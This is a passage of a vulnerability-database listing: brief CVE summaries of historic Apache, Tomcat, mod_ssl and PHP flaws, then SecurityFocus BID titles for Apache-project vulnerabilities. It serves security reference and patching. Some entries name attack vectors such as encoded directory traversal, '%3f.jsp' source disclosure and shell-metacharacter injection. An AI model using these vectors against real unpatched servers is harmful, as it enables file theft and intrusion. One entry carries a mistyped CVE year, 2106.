9186| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
9187| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
9188| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
9189| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
9190| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
9191| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
9192| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
9193| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
9194| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
9195| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
9196| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
9197| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
9198| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
9199| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
9200| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
9201| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
9202| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
9203| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
9204| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
9205| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
9206| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
9207| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
9208| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
9209| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
9210| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
9211| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
9212| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
9213| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
9214| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
9215| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
9216| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
9217| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
9218| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
9219| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
9220| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
9221| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
9222| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
9223| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
9224| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
9225| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
9226| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
9227| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
9228| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
9229| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
9230| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
9231| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
9232| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
9233| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
9234| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
9235| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
9236| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
9237| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
9238| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
9239| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
9240| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
9241| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
9242| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
9243| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
9244| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
9245| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
9246| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
9247| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
9248| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
9249| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
9250| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
9251| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
9252| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
9253| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
9254| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
9255| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
9256| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
9257| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
9258| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
9259| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
9260|
9261| SecurityFocus - https://www.securityfocus.com/bid/:
9262| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
9263| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
9264| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
9265| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
9266| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
9267| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
9268| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
9269| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
9270| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
9271| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
9272| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
9273| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
9274| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
9275| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
9276| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
9277| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
9278| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
9279| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
9280| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
9281| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
9282| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
9283| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
9284| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
9285| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
9286| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
9287| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
9288| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
9289| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
9290| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
9291| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
9292| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
9293| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
9294| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
9295| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
9296| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
9297| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
9298| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
9299| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
9300| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
9301| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
9302| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
9303| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
9304| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
9305| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
9306| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
9307| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
9308| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
9309| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
9310| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
9311| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
9312| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
9313| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
9314| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
9315| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
9316| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
9317| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
9318| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
9319| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
9320| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
9321| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
9322| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
9323| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
9324| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
9325| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
9326| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
9327| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
9328| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
9329| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
9330| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
9331| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
9332| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
9333| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
9334| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
9335| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
9336| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
9337| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
9338| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
9339| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
9340| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
9341| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
9342| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
9343| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
9344| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
9345| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
9346| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
9347| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
9348| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
9349| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
9350| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
9351| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
9352| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
9353| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
9354| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
9355| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
9356| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
9357| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
9358| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
9359| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
9360| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
9361| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
9362| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
9363| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
9364| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
9365| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
9366| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
9367| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
9368| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
9369| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
9370| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
9371| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
9372| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
9373| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
9374| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
9375| [100447] Apache2Triad Multiple Security Vulnerabilities
9376| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
9377| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
9378| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
9379| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
9380| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
9381| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
9382| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
9383| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
9384| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
9385| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
9386| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
9387| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
9388| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
9389| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
9390| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
9391| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
9392| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
9393| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
9394| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
9395| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
9396| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
9397| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
9398| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
9399| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
9400| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
9401| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
9402| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
9403| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
9404| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
9405| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
9406| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
9407| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
9408| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
9409| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
9410| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
9411| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
9412| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
9413| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
9414| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
9415| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
9416| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
9417| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
9418| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
9419| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
9420| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
9421| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
9422| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
9423| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
9424| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
9425| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
9426| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
9427| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
9428| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
9429| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
9430| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
9431| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
9432| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
9433| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
9434| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
9435| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
9436| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
9437| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
9438| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
9439| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
9440| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
9441| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
9442| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
9443| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
9444| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
9445| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
9446| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
9447| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
9448| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
9449| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
9450| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
9451| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
9452| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
9453| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
9454| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
9455| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
9456| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
9457| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
9458| [95675] Apache Struts Remote Code Execution Vulnerability
9459| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
